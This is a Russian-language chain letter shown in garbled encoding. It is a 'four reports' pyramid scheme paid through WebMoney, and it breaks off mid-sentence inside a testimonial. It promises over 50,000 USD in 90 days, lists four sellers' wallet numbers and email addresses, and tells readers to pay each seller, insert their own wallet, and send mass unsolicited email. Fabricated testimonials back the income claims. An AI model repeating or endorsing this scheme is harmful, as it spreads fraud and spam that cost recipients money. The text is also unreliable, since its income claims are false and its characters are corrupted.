âñïîìíèòå! Îäèí ÷åëîâåê, êîòîðîìó âû ýòî ïîøëåòå ìîæåò ïîñëàòü è 50.000 êîïèé ... à Âàøå èìÿ áóäåò íà êàæäîé èç íèõ!!! Ïîìíèòå, ÷òî ÷åì áîëüøå ïðîãðàìì âû ïîøëåòå, òåì áîëüøå ïîòåíöèàëüíûõ çàêàç÷èêîâ ïðèîáðåòåòå! Òàê ÷òî, äðóçüÿ, ÿ ïðåäîñòàâëÿþ Âàì âîçìîæíîñòü, èíôîðìàöèþ, ìàòåðèàë äëÿ òîãî ÷òîáû âû ïîëó÷èëè ôèíàíñîâóþ íåçàâèñèìîñòü. ÒÅÏÅÐÜ ÝÒÎ ÇÀÂÈÑÈÒ ÒÎËÜÊÎ ÎÒ ÂÀÑ! "ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ" ïåðåä òåì êàê óäàëèòå ýòîò mail, êàê ÷óòü íå ñäåëàë ÿ. Îòâåäèòå ñåáå íåìíîãî âðåìåíè, ïðî÷òèòå è ïî-íàñòîÿùåìó ïîäóìàéòå íàä ýòèì. Âîçüìèòå ðó÷êó è ïîñ÷èòàéòå, ÷òî ìîæåò èç ýòîãî ïîëó÷èòüñÿ, åñëè Âû ýòî ïîïðîáóåòå. Âîçüìèòå ñàìûé ïëîõîé âàðèàíò, íî è â ýòîì ñëó÷àå ó âàñ áóäåò ìíîãî äåíåã.  ñàìîì õóäøåì ñëó÷àå ïîëó÷èòå ñâîþ èíâåñòèöèþ íàçàä. Âñå ñîìíåíèÿ, êîòîðûå ó âàñ åñòü, èñ÷åçíóò, êîãäà ïîëó÷èòå ñâîé ïåðâûé çàêàç. ÝÒÎ ÄÅÉÑÒÂÓÅÒ!!!!! Jody Jacobs, Richmond,VA. À ÒÅÏÅÐÜ, ÂÎÒ ÝÒÀ ÏÅÐÂÎÑÕÎÄÍÀß ÏÐÎÃÐÀÌÌÀ, ÊÎÒÎÐÀß ÂÀÌ ÇÀÐÀÁÎÒÀÅÒ ÒÛÑß×È ÄÎËËÀÐÎÂ!!!!! ************************************************************ ÈÍÑÒÐÓÊÖÈß : Ýòîò ìåòîä çàðàáîòêà äåíåã íà ñàìîì äåëå ÄÅÉÑÒÂÓÅÒ ÍÀ 100%, ÊÎÃÄÀ ÓÃÎÄÍÎ, ÃÄÅ ÓÃÎÄÍÎ. ß óâåðåí, ÷òî Âû ñìîæåòå çàðàáîòàòü áîëåå 50.000,- USD â ïîñëåäóþùèå 90 äíåé. Ïåðåä òåì êàê ñêàçàòü "ãëóïîñòü..." ïîæàëóéñòà ïðî÷èòàéòå âíèìàòåëüíî è âíèêíèòå â ñóòü ýòîé ïðîãðàììû. Ýòî íå öåïíîå ïèñüìî, à îòëè÷íàÿ ëåãàëüíàÿ âîçìîæíîñòü çàðàáîòàòü äåíüãè.  ÷åì ñìûñë? Òàê êàê è â ëþáîé multi-level ñõåìå, òîðãîâëÿ ñòðîèòñÿ íà ïðèâëå÷åíèè íîâûõ ïàðòíåðîâ è ïðîäàæå ñâîèõ òîâàðîâ. ÇÀÊÀÇÛ Ê ÂÀÌ ÏÐÈÕÎÄßÒ È ÂÛÏÎËÍßÞÒÑß ÏÎ E-MAIL, ïîýòîìó íå âîçíèêàåò ëè÷íîãî êîíòàêòà. Äåëàåòñÿ âñå äîìà èëè â ó÷ðåæäåíèè. Ýòî ñàìàÿ áîëüøàÿ multi-level âîçìîæíîñòü íà ñâåòå!!!!! È ÝÒÎ ÍÅ ÏÐÅÓÂÅËÈ×ÅÍÈÅ!!   Ñóùåñòâóåò äâà îñíîâíûõ ìåòîäà äëÿ ñòðîèòåëüñòâà âàøèõ íèæíèõ óðîâíåé: Ìåòîä #1- ÏÎÑÛËÊÀ ÌÀÑÑÎÂÎÉ E-MAIL ÐÅÊËÀÌÛ Ïðåäïîëîæèì, íàïðèìåð, ÷òî Âû õîòèòå íà÷àòü ñ ìàëîãî êîëè÷åñòâà, òîëüêî äëÿ òîãî, ÷òîáû ïîñìîòðåòü êàê ýòî äåéñòâóåò. Äîïóñòèì, ÷òî Âû è âñå âîâëå÷åííûå Âàìè êîìïàíüîíû ïîøëåòå òîëüêî 2.000 e-mail (êàæäûé èç Âàñ). Òàêæå ïðåäïîëîæèì, ÷òî ïîëó÷èòå âñåãî 0,5% îòâåòîâ. Åñëè èñïîëüçóåòå õîðîøèé ïåðå÷åíü àäðåñîâ òî 1%. Ïîòîì ìíîãî ëþäåé ðàçîøëþò óæå ñîòíè òûñÿ÷ ýòèõ ïðîãðàìì, áëàãîäàðÿ âàøèì 2.000. Ïðîäîëæèì íàø ïðèìåð, âû ïîñëàëè 2.000 ïðîãðàìì. Èç 0,5% îòâåòîâ ýòî òîëüêî 10 çàêàçîâ íà REPORT #1. Ýòèõ äåñÿòü ÷åëîâåê ïîñëàëî 20.000 ïðîãðàìì, ÷òî ïðè 0,5% - óæå 100 çàêàçîâ íà REPORT #2. Êàæäûé èç ýòèõ 100 ïîñëàëè ïî 2.000 ïðîãðàìì, à Âû ïîëó÷èëè 1.000 çàêàçîâ íà REPORT #3, à åñëè êàæäûé èç ýòèõ 1.000 ïîøëåò 2.000 ñâîèõ ïðîãðàìì, òàê ïðè 0,5% ïîëó÷èòå 10.000 çàêàçîâ íà REPORT #4. À ýòî 10.000 õ 5 = 50.000 USD â íàëè÷íîñòè!!!!! Âàø êîíå÷íûé çàðàáîòîê â ýòîì ñëó÷àå áóäåò: 50+500+5.000+50.000 = 55.550,- USD!!!!!!! Ïîìíèòå, ÷òî ýòî ïðåäïîëîæåíèå äëÿ 1990 ÷åëîâåê. Òå, êîòîðûå íå çàõîòÿò ó÷àñòâîâàòü, ýòó âîçìîæíîñòü óäàëÿò, è íè÷åãî íå ñëó÷èòñÿ! Ïîïðîáóéòå ïîäóìàòü ìèíóòêó! À ÷òî åñëè êàæäûé ïîøëåò 100.000 ïðîãðàìì âìåñòî 2.000 ?! Âåðüòå ìíå, ÷òî ëþäè ýòî ñäåëàþò, âîçìîæíî è áîëüøå! Ìåæäó ïðî÷èì, Âàø ôèíàíñîâûé âêëàä ÿâëÿåòñÿ ìèíèìàëüíûì... Âû óæå èìååòå ïîäêëþ÷åíèå ê Èíòåðíåò, à e-mail - áåñïëàòåí! REPORT #2 Âàì ïîêàæåò ñàìûå ëó÷øèå ìåòîäû ìàññîâîé ðàññûëêè e-mail è ãäå ìîæíî íàéòè ïåðå÷åíü àäðåñîâ. ÌÅÒÎÄ #2 - ÁÅÑÏËÀÒÍÀß ÐÅÊËÀÌÀ  ÈÍÒÅÐÍÅÒÅ Ðåêëàìà â Èíòåðíåòå ÿâëÿåòñÿ íåòðåáîâàòåëüíîé è ñóùåñòâóåò òûñÿ÷à ÁÅÑÏËÀÒÍÛÕ ìåñò äëÿ ðåêëàìû. Ñêàæåì, íàïðèìåð, ÷òî âû íà÷íåòå ñêðîìíî, òîëüêî äëÿ òîãî, ÷òîáû óçíàòü äåéñòâóåò ëè ýòî. Âàøåé öåëüþ áû áûëî íàéòè âñåãî ëèøü 10 ÷åëîâåê íà ïåðâûé óðîâåíü òî åñòü òåõ, êòî çàêàçàë áû ó Âàñ REPORT#1 (ðàçìåùåíèåì áåñïëàòíûõ îáúÿâëåíèé â Èíòåðíåò ëåãêî íàéòè è áîëüøåå êîëè÷åñòâî çàêàçîâ). Äàëüøå ïðåäïîëîæèì, ÷òî êàæäûé èç Âàøåé îðãàíèçàöèè íàéäåò òîëüêî 10 ÷åëîâåê. Ïîñìîòðèì íà ïðèìåðå è óâèäèì, ÷òî ïðîèçîéäåò: 1-é level - âàøèõ 10 êëèåíòîâ ïî 5 USD.............................50,- USD. 2-é level - ïî 10 êëèåíòîâ îò òåõ 10-òè (5,- USD x 100) ........ 500,- USD. 3-é level - ýòî óæå 1.000 êëèåíòîâ (5,- USD x 1.000) ........5.000,- USD. 4-é level - 10.000 êëèåíòîâ (5,- USD x 10.000) ............... 50.000,- USD. Èòîãî 55.550,- USD. Ïîìíèòå, ÷òî ýòî òîëüêî ïðèìåð äëÿ 10 êëèåíòîâ. Ìíîãèå ëþäè íàéäóò ñîòíè êëèåíòîâ!!! ÏÎÄÓÌÀÉÒÅ ÎÁ ÝÒÎÌ!!! Âñå, ÷òî âû äîëæíû ñäåëàòü, çà êàæäûå $5 USD, êîòîðûå ïîëó÷èòå â ñâîé êîøåëåê - ýòî ïîñëàòü ïîêóïàòåëþ çàêàçàííûé REPORT. È ÝÒÎ ÂÑÅ!!! ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ, ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!! Ýòî Âàì ãàðàíòèðóåò, ÷òî e-mail, êîòîðûå áóäóò ïîñûëàòü ñ ÂÀØÈÌ èìåíåì, áóäóò áûñòðåå ðàñïðîñòðàíÿòüñÿ, ïîòîìó ÷òî îíè íå ìîãóò áûòü ïîñëàíû ïîêà REPORT's íåò ó âàøåãî çàêàç÷èêà!!! ÈÒÀÊ, ÄÎÑÒÓÏÍÛÅ REPORT's: ****** Çàêàæè ñåáå êàæäûé èç íèõ ñîãëàñíî íîìåðó è íàçâàíèþ ******   ÇÀÊÀÆÈÒÅ ÑÅÁÅ REPORT's ÑÅÉ×ÀÑ !!!   Òàáëèöà 1. REPORT's è ðåêâèçèòû ïðîäàâöîâ. ¹ Ïåðå÷åíü REPORT's R- è Z- êîøåëüêè ïðîäàâöà E-mail ïðîäàâöà 1 REPORT #1 "Ðóêîâîäñòâî ïî áåñïëàòíîé è ýôôåêòèâíîé ðåêëàìå â Èíòåðíåò" R871542342557 Z469857407500 WM_13@yahoo.com 2 REPORT #2 "Ðóêîâîäñòâî ïî ìàññîâîé ðåêëàìíîé ðàññûëêå E-Mail " R803112125203 Z460897718401 verysimplejob@yahoo.com 3 REPORT #3 "Ñåêðåòû ìíîãîóðîâíåâîãî ìàðêåòèíãà â Èíòåðíåò" R916511407235 Z601004161913 poul007@narod.ru 4 REPORT #4 "Êàê ñòàòü ìèëëèîíåðîì, èñïîëüçóÿ MLM è Èíòåðíåò" R117465742973 Z095492416150 asebo@mail.ru Ñ ëþáûì èç ïðîäàâöîâ âñåãäà ìîæíî ñâÿçàòüñÿ ÷åðåç åãî e-mail. Íî, ïîæàëóéñòà, íå çàãðóæàéòå èõ ëèøíèìè âîïðîñàìè, îíè ìîãóò áûòü î÷åíü çàíÿòû îáðàáîòêîé çàêàçîâ (îñîáåííî íà òðåòüåì è ÷åòâåðòûõ óðîâíÿõ). ÂÎÒ, ×ÒÎ ÍÓÆÍÎ ÑÄÅËÀÒÜ ÂÀÌ: 1. Ñêîïèðîâàòü ïðîãðàììó WebMoney keeper 2 è ñîçäàòü ñåáå ðóáëåâûé R-êîøåëåê. Èíñòðóêöèè ïî ðàáîòå ñ êîøåëüêîì è èíôîðìàöèÿ îá ýòîé ñèñòåìå ïëàòåæåé íà ñàéòå http://www.webmoney.ru 2. Ïîïîëíèòü ÑÂÎÉ êîøåëåê ðóáëåâûì ýêâèâàëåíòîì $20 + 3% ïî êóðñó ÖÁ, âûáðàâ ëþáîé èç äîñòóïíûõ íà http://www.webmoney.ru/rus/perevods.htm ñïîñîáîâ ïåðåâîäà. 3. Ïîñëå ïîñòóïëåíèÿ äåíåã â âàø êîøåëåê, çàêàæèòå ñåáå âñå ÷åòûðå REPORT's (èç ïåðå÷íÿ Òàáëèöû 1), ïóòåì ïåðåâîäà WebMoney èç ñâîåãî êîøåëüêà â êîøåëåê ïðîäàâöà, ñóììû $5 ÑØÀ ïî êóðñó ÖÁ, çà êàæäûé REPORT. Îáÿçàòåëüíî, óêàæèòå â ïîëå êîììåíòàðèÿ íîìåð REPORT è îáðàòíûé e-mail àäðåñ. Ïðèìåð: REPORT#1 xxxxxx@xxxx.xxx (Ïîäòâåðäèòå îïëàòó ïî e-mail) 4.  Òàáëèöå 1, óäàëèòå íîìåð êîøåëüêà èç ñòðîêè 4 è ïåðåìåñòèòå íà åãî ìåñòî íîìåð êîøåëüêà èç ñòðîêè 3. Çàòåì, ïåðåìåñòèòå íîìåð êîøåëüêà èç ñòðîêè 2 â îñâîáîäèâøååñÿ ìåñòî â ñòîðîêå 3. È, íàêîíåö, ïåðåìåñòèòå íîìåð êîøåëüêà èç ñòðîêè 1 â ñòðîêó 2.  îñâîáîäèâøååñÿ ìåñòî â ñòðîêå 1 âñòàâüòå íîìåð ñâîåãî R- êîøåëüêà. Òåïåðü Âû ñòàëè ïðîäàâöîì REPORT#1. 5. Òîæå ñàìîå ïðîäåëàéòå ñ e-mail àäðåñàìè. ÏÐÈÌÅ×ÀÍÈÅ: *Çà êàæäûé REPORT ïåðåâåäèòå ðóáëåâûé ýêâèâàëåíò $5 USD ïî êóðñó ÖÁ, ñî ñâîåãî êîøåëüêà íà íîìåð êîøåëüêà ïðîäàâöà. (USD ïîòîìó, ÷òî â ýòî âîâëå÷åíû æåëàþùèå ñî âñåãî ñâåòà). Âñå îïåðàöèè îò ñîçäàíèÿ êîøåëüêà äî îïëàòû REPORT's ïðîèçâîäÿòñÿ â ïðîãðàììå WebMoney Keeper. * êîøåëüêå, äåíüãè õðàíÿòñÿ â âèäå óñëîâíûõ åäèíèö (WebMoney). Ïî êóðñó 1WM = 1 ðóá. äëÿ R- êîøåëüêà 1WM = 1 äîëëàð ÑØÀ äëÿ Z- êîøåëüêà. *Êîãäà ñäåëàåòå ñâîé çàêàç, óáåäèòåñü, ÷òî âû çàêàçàëè âñå REPORT. Âñå îíè ïîíàäîáÿòñÿ äëÿ òîãî, ÷òîáû Âû ñîõðàíèëè ó ñåáÿ â êîìïüþòåðå è, ïîòîì, ìîãëè ïðîäàâàòü êîïèè. Âàì äåéñòâèòåëüíî íóæíû âñå ýòè REPORT, èíà÷å ëþäè íå ñìîãóò ñäåëàòü ó âàñ çàêàç, à ñàìîå ãëàâíîå, ýòè REPORT's ñîäåðæàò âàæíóþ èíôîðìàöèþ î òîì, êàê èì äîñòè÷ü óñïåõà!! È ðàçâèâàòü ýòîò áèçíåññ. * òå÷åíèè íåñêîëüêèõ äíåé ïîñëå îïëàòû, âû ïîëó÷èòå ÷åòûðå e-mail, â êàæäîì ïî îäíîìó REPORT(ó). Ñîõðàíèòå èõ â âàøåì êîìïüþòåðå (è íà äèñêåòå äëÿ íàäåæíîñòè), ÷òîáû îíè âñåãäà áûëè ãîòîâû ê ïîñûëêå òûñÿ÷àì ëþäåé, êîòîðûå èõ ó âàñ çàêàæóò. Òåïåðü ýòî Âàø òîâàð, ñ ïðàâîì ïðîäàæè! ÂÀÆÍÎ: - íå ìåíÿéòå íîìåðà êîøåëüêîâ, êîòîðûå íàõîäÿòñÿ â ñïèñêå çà êàæäûì èç REPORT's (íèêàêèì ñïîñîáîì), òîëüêî òàê, êàê ýòî óêàçàíî â ïóíêòàõ (1 - 5), èíà÷å ïîòåðÿåòå áîëüøóþ ÷àñòü ñâîèõ äîõîäîâ. Êîãäà ïîéìåòå, êàê ýòî äåéñòâóåò, Âàì ñðàçó ñòàíåò ïîíÿòíî, ïî÷åìó ýòî ïåðåñòàåò äåéñòâîâàòü, êîãäà ÷òî-íèáóäü èçìåíèøü íå ïî ïóíêòàì(1 - 5) . Ïîìíèòå, ýòîò ìåòîä áûë ïðîâåðåí, è åñëè Âû èçìåíèòå åãî, îí ïåðåñòàíåò ðàáîòàòü!! Âîçüìèòå ýòîò äîêóìåíò ñ èçìåíåííûì ïåðå÷íåì èìåí è ñ÷åòîâ è ñêîïèðóéòå åãî íà âàø êîìïüþòåð. Òåïåðü âû ãîòîâû ê ðàáîòå è ìîæåòå ðàññûëàòü ýòî ïðåäëîæåíèå â ïîèñêàõ ñâîèõ êëèåíòîâ, íî ïðåäâàðèòåëüíî îáÿçàòåëüíî ïðî÷èòàéòå âñå ÷åòûðå ðóêîâîäñòâà - îíè ñèëüíî ïîìîãóò âàì. Íå äåëàéòå íèêàêèõ èçìåíåíèé â ÷àñòè ÈÍÑÒÐÓÊÖÈÈ!!! Âàø ôèíàíñîâûé âêëàä â äàííîå ïðåäïðèÿòèå ÿâëÿåòñÿ ïðàêòè÷åñêè íè÷òîæíûì (êîíå÷íî æå åñëè âû ìîæåòå ïîçâîëèòü ñåáå èíâåñòèðîâàòü 20,- USD, èëè, íàïðèìåð, ìîæåòå ñëîæèòüñÿ ñ äðóçüÿìè. ×åì áîëüøå áóäåò Âàñ äëÿ ïîñûëêè ðåêëàìû è email, òåì áîëüøå âû èõ ïîøëåòå!. Âû, êîíå÷íî æå, óæå ïîäêëþ÷åíû ê ñåòè Èíòåðíåò è èìååòå áåñïëàòíûé e-mail!  ïîìîùü Âàì ñ âàøèì ìàðêåòèíãîì, ñîçäàíû 4 REPORT(ðóêîâîäñòâà), êîòîðûå âû çàêàçàëè. Îíè ñîäåðæàò ïîëåçíóþ èíôîðìàöèþ, íàïðèìåð, êàê ïîñûëàòü ìàññîâóþ ïî÷òîâóþ ðàññûëêó (e-mail), ãäå íàéòè òûñÿ÷ó âîçìîæíîñòåé ñäåëàòü áåñïëàòíóþ ðåêëàìó è ò.ä. Òàêæå âàì áóäóò äàíû èíôîðìàöèè îá ÈÍÒÅÐÍÅÒ-ÌÀÐÊÅÒÈÍÃ-ÊËÓÁÀÕ. Çäåñü íàéäåòå êîíôåðåíöèþ, ãäå èíòåðíåò-ïðåäïðèíèìàòåëè ñ öåëîãî ñâåòà âçàèìíî îáìåíèâàþòñÿ èíôîðìàöèåé è ñåêðåòàìè óñïåõà. Êëóá òàêæå áåñïëàòíî ïðåäîñòàâëÿåò èíòåðíåòîâûå èíñòðóìåíòû è óñëóãè äëÿ ñîçäàíèÿ ÑÎÁÑÒÂÅÍÍÎÃÎ ÈÍÒÅÐÍÅÒ ÏÐÅÄÏÐÈßÒÈß. Ïîñòàâÿò áåñïëàòíî software äëÿ îòïðàâëåíèÿ ìàññîâûõ e-mail è êàæäûé äåíü 1.000.000 íîâûõ e-mail àäðåñîâ. Òàêæå Âàì ïîñîâåòóþò, ãäå íàéòè áåñïëàòíóþ WEB ñòðàíèöó, êàê ïîëó÷èòü TOP îöåíêó â ïîèñêîâûõ ïðîãðàììàõ äëÿ Âàøåé ñòðàíèöû, êàê ïðîäàòü Âàø ïðîäóêò ïðè ïîìîùè ðåêëàìû, áþëëåòåíåé, áàííåðîâ è ìíîãî äðóãèõ ñîâåòîâ. Àäðåñ IMR: http://www.marketingontheweb.net Ïðèëîæåíèå àäðåñîâ ñî ñïèñêàìè è ïîèñêîâûìè ïðîãðàììàìè e-mail àäðåñîâ: http://www.whowhere.lycos.com/Email http://www.infospace.com/info/email1.htm !!! ÎÁßÇÀÒÅËÜÍÎ ÏÐÎÂÅÐÜÒÅ ÏÐÀÂÈËÜÍÎÑÒÜ ÈÇÌÅÍÅÍÈß ÒÀÁËÈÖÛ !!! Ïðèáëèçèòåëüíî 50.000 íîâûõ ëþäåé ïîäêëþ÷àþòñÿ ê Èíòåðíåòó êàæäûé ìåñÿö! Ïðîâåðüòå, îñîáåííî âíèìàòåëüíî, ïðàâèëüíîñòü óêàçàíèÿ íîìåðà êîøåëüêà ïðè ïåðåâîäå. Ýòî î÷åíü âàæíî, òàê êàê ïîêà íå çàïëàòèòå ïðàâèëüíî, çàêàç íå ïðèäåò, à Âû íå ïîëó÷èòå ñâîé report. Íàéäèòå âðåìÿ, ÷òîáû âû ñìîãëè ñäåëàòü âñå ïðàâèëüíî è íå òîðîïÿñü, ïîòîìó ÷òî ýòî îñíîâà Âàøåãî áèçíåñà. ************* ÑÎÂÅÒÛ Ê ÓÑÏÅÕÓ ************ *Ñ×ÈÒÀÉÒÅ ÝÒÎ ÑÂÎÈÌ ÁÈÇÍÅÑÎÌ!!! Áóäüòå áûñòðûìè, ïðîôåññèîíàëüíûìè è ïðèäåðæèâàéòåñü èíñòðóêöèé. *Çàêàæèòå ñåáå ÷åòûðå REPORT's ÏÐßÌÎ ÑÅÉ×ÀÑ, ÷òîáû âû èõ èìåëè, êîãäà ê âàì íà÷íóò ïðèõîäèòü çàêàçû, ïîòîìó ÷òî: *Êîãäà ïîëó÷èòå $5 ÑØÀ, âû ÄÎËÆÍÛ ïîñëàòü æåëàåìûé ïðîäóêò (REPORT)! * ÂÑÅÃÄÀ ÎÒÏÐÀÂËßÉÒÅ ÇÀÊÀÇÛ Â ÒÎÒ ÄÅÍÜ ÊÎÃÄÀ ÎÍÈ ÏÐÈÉÄÓÒ!!!! *Áóäüòå òåðïåëèâû è íå ñäàâàéòåñü!! Åñëè áóäåòå òî÷íî èñïîëíÿòü ïðåäïèñàíèÿ, Âàøè ðåçóëüòàòû ÁÓÄÓÒ ÓÑÏÅØÍÛÌÈ!!!! *À ÃËÀÂÍÎÅ, ÂÅÐÜÒÅ Â ÑÅÁß È ÒÎÌÓ, ×ÒÎ Ó ÂÀÑ ÏÎËÓ×ÈÒÜÑß!!!!!!! ************ ÍÀØÈ ÐßÄÛ ÓÑÏÅÕÀ *********** Ïðèäåðæèâàéòåñü ýòèõ ðÿäîâ è ó âàñ âñå ïîëó÷èòüñÿ: Åñëè íå ïîëó÷èòå 20 çàêàçîâ íà Report #1 â òå÷åíèè äâóõ íåäåëü, ïðîäîëæàéòå äåëàòü ðåêëàìó è ïîñûëàòü e-mail, äî òåõ ïîð, ïîêà èõ íå ïîëó÷èòå. Ïîòîì âû â òå÷åíèè íåñêîëüêèõ íåäåëü Âû äîëæíû ïîëó÷èòü çàêàçû íà Report #2. Åñëè ýòî íå ïðîèçîéäåò, íå ïåðåñòàâàéòå ïîñûëàòü ðåêëàìó äî òåõ ïîð, ïîêà íå äîñòèãíèòå 100 çàêàçîâ íà Report #2. Êàê òîëüêî ïîëó÷èòå 100 çàêàçîâ íà Report #2, ÌÎÆÅÒÅ ÍÀ×ÀÒÜ ÎÒÄÛÕÀÒÜ, ïîòîìó ÷òî ñèñòåìà â ýòîì ñëó÷àå óæå ðàáîòàåò çà Âàñ à Âàøè äåíüãè áóäóò ïðèõîäèòü ñàìè ïî ñåáå. ÝÒÎ ÂÀÆÍÎ ÇÀÏÎÌÍÈÒÜ: Âñåãäà, êîãäà âàøå èìÿ ïðîäâèãàåòñÿ âíèç ïî ñïèñêó, Âû ïîëó÷àåòå çàêàç íà ñëåäóþùèé Report, ïîýòîìó ìîæåòå ñëåäèòü ñâîå ïðîäâèæåíèå, ïî òîìó êàêîé êàêîé Report îò Âàñ çàêàçûâàþò ëþäè! Åñëè ïîæåëàåòå ïîâûñèòü ñâîé äîõîä, òî ïðîñòî ïîñûëàéòå íîâóþ ïàðòèþ e-mail. Òàê Âû íà÷íåòå âåñü ïðîöåññ ñíà÷àëà. ÍÅ ÑÓÙÅÑÒÂÓÅÒ ÍÈÊÀÊÎÉ ÃÐÀÍÈÖÛ ÏÐÈÁÛËÈ, ÊÎÒÎÐÓÞ ÌÎÆÍÎ ÄÎÑÒÈÃÍÓÒÜ Â ÝÒÎÌ ÁÈÇÍÅÑÅ!!! Ïåðåä òåì, êàê ðåøèòå õîòèòå ýòèì çàíèìàòüñÿ èëè íåò, ïðî÷èòàéòå ñëåäóþùèå ôàêòû îá ýòîé ïðîãðàììå: ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÏÐÎÈÇÂÎÄÑÒÂÎ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ! ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÒÐÀÍÑÏÎÐÒÈÐÎÂÊÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ! ÏÐÎÄÀÅÒÅ ÏÐÎÄÓÊÒ, ÐÅÊËÀÌÀ ÊÎÒÎÐÎÃÎ ÂÀÌ ÍÈ×ÅÃÎ ÍÅ ÑÒÎÈÒ! ÈÑÏÎËÜÇÓÅÒÅ ÑÈËÓ ÈÍÒÅÐÍÅÒÀ È MULTI-LEVEL MARKETING! ÂÀØÅÉ ÅÄÈÍÑÒÂÅÍÍÎÉ ÂÛÄÀ×ÅÉ ÊÐÎÌÅ ÍÀ×ÀËÜÍÎÉ ÈÍÂÅÑÒÈÖÈÈ 20,- USD ßÂËßÅÒÑß ÒÎËÜÊÎ ÂÀØÅ ÂÐÅÌß! ÂÅÑÜ ÇÀÐÀÁÎÒÎÊ ÊÎÒÎÐÛÉ ÂÛ ÏÎËÓ×ÈÒÅ ßÂËßÅÒÑß ×ÈÑÒÎÉ ÏÐÈÁÛËÜÞ! ÝÒÀ ÏÐÎÃÐÀÌÌÀ ÍÀÂÑÅÃÄÀ ÈÇÌÅÍÈÒ ÂÀØÓ ÆÈÇÍÜ!   ***** ÎÏÛÒ ÄÐÓÃÈÕ ***** Ýòà ïðîãðàììà äåéñòâóåò, íî âû äîëæíû òî÷íî èñïîëíÿòü èíñòðóêöèè! ÃËÀÂÍÎÅ ÍÅ ÏÎÌÅÙÀÉÒÅ ÂÀØÅ ÈÌß ÍÀ ÄÐÓÃÓÞ ÏÎÇÈÖÈÞ, ÝÒÎ ÎÁÎÉÄÅÒÑß ÂÀÌ ÁÎËÜØÎÉ ÏÎÒÅÐÅÉ ÄÅÍÅÃ, ÝÒÎ ÏÐÎÑÒÎ ÍÅ ÄÅÉÑÒÂÓÅÒ!!! ß - ðåàëüíîå äîêàçàòåëüñòâî ðàáîòîñïîñîáíîñòè ýòîãî áèçíåñà. Ýòî äåéñòâèòåëüíî ïðåâîñõîäíàÿ âîçìîæíîñòü, òàê ðåàëüíî è ëåãêî çàðàáîòàòü äåíüãè ñ ìèíèìàëüíûì âêëàäîì. Åñëè ðåøèòåñü ýòî ïîïðîáîâàòü, ïðèäåðæèâàéòåñü èíñòðóêöèé ïðîãðàììû è áóäåòå íà ëó÷øåé äîðîãå ê ôèíàíñîâîé íåçàâèñèìîñòè. Steven Bardfield, Portland, OR ************************************************************ Ýòà ïðîãðàììà äåéñòâèòåëüíî äåéñòâóåò. Æèâó íå â Àìåðèêå, à â Åâðîïå è ñíà÷àëà ÿ áîÿëñÿ, íå áûë óâåðåí, äåéñòâèòåëüíî ëè ýòî äåéñòâóåò, à ïîòîìó, íå îòíîñèëñÿ ê ýòîìó ñåðüåçíî. À ïîòîì ñêàçàë ñåáå: "À ïî÷åìó íåò?". Ñîçäàë êîøåëåê, ïîïîëíèë åãî , è ñäåëàë ïåðåâîä, çàêàçàâ ñåáå ÷åòûðå Reporty.  òå÷åíèè 5-è äíåé ïîëó÷èë èõ âñåõ ïî e-mail. Äîëüøå âñåãî ïðèøëîñü æäàòü Report #4. Íî ýòî è ïîíÿòíî, âåäü ó ïðîäàâöà ýòîãî, ïîñëåäíåãî óðîâíÿ, òûñÿ÷è çàêàçîâ. Âñå ñäåëàë òî÷íî ïî èíñòðóêöèè (÷òîáû áûòü óâåðåííûì, åñëè ýòî äåëî íå çàðàáîòàåò, òî ýòî íå ïðè÷èíà ìîåé îøèáêè) è æäàë. ß âíèìàòåëüíî ïðî÷èòàë âñå ïîëó÷åííûå ðóêîâîäñòâà, à êîãäà óçíàë, êàê âñå íàäî äåëàòü, íà÷àë ñâîé áèçíåñ. ß èñêàë àäðåñà âåçäå è ñäåëàë ñåáå äëèííûé ñïèñîê (ìíå ýòî áûëî äåéñòâèòåëüíî èíòåðåñíî, ýòî áûëî êàê íîâîå õîááè, è ÿ íå ìîã íè÷åãî ïîòåðÿòü), êàê íåíîðìàëüíûé ÿ íà÷àë ïîñûëàòü e-mail ëþäÿì â öåëîì ñâåòå. Äåëàë ÿ ýòî ïîñòîÿííî, è êàæäûé äåíü êîíòðîëèðîâàë ñâîé ïî÷òîâûé ÿùèê è êîøåëåê. Ïðèìåðíî ÷åðåç äåíü íà÷àëè ïðèõîäèòü çàêàçû. Äî ñèõ ïîð ïîìíþ òîò ìîìåíò, êîãäà îáíàðóæèë ïåðâûé çàêàç. Íåêîòîðîå âðåìÿ ÿ ïðîñòî ñòîÿë è íå ìîã äâèãàòüñÿ: "Ýòî ðàáîòàåò! Ýòà øòóêà çàðàáîòàëà ìàòü åå òàê!". Ïðîøó ïðîùåíèÿ çà âûðàæåíèå, íî ß áûë î÷åíü ñ÷àñòëèâ, è íà÷àë ïîñûëàòü åùå áîëüøå e-mail, ïîÿâèëñÿ ñèëüíåéøèé ñòèìóë ê ðàáîòå. Íà ñëåäóþùèé äåíü - ïóñòîé ÿùèê è ñíîâà ÿ ïîäóìàë, ÷òî ýòî íå áóäåò ðàáîòàòü, íî îêàçàëîñü íàîáîðîò. Íà ñëåäóþùèé äåíü ÿ ïîëó÷èë 3 çàêàçà, â òîò æå ìîìåíò ÿ ïîñëàë ëþäÿì èõ reporty, ÷òîáû ìîãëè òîæå áûñòðî çàðàáîòàòü äåíüãè (äëÿ ñåáÿ è äëÿ ìåíÿ). Çà äâå íåäåëè, êàæäûé äåíü ÿ ñèäåë ïðèìåðíî 30 ìèíóò ó êîìïüþòåðà è ïîñûëàë çàêàçû.  òå÷åíèè äâóõ íåäåëü ÿ ïîëó÷èë 29 çàêàçîâ íà Report #1. Ïîòîì çàêàçû ñòàëè ïðèõîäèòü ÷àùå è áûñòðåå, êàæäóþ íåäåëþ ÿ ïîëó÷àë îêîëî ñòà çàêàçîâ, a äåíüãè âñå ïîñòóïàëè íà ìîé ñ÷åò.  öåëîì ÿ çàðàáîòàë îêîëî 64.000,- USD.  ÝÒÎ ÍÅ ÂÎÇÌÎÆÍÎ ÁÛËÎ ÏÎÂÅÐÈÒÜ! Íà ïðîøëîé íåäåëå ÿ êóïèë ñåáå íîâóþ òà÷êó è ýòî 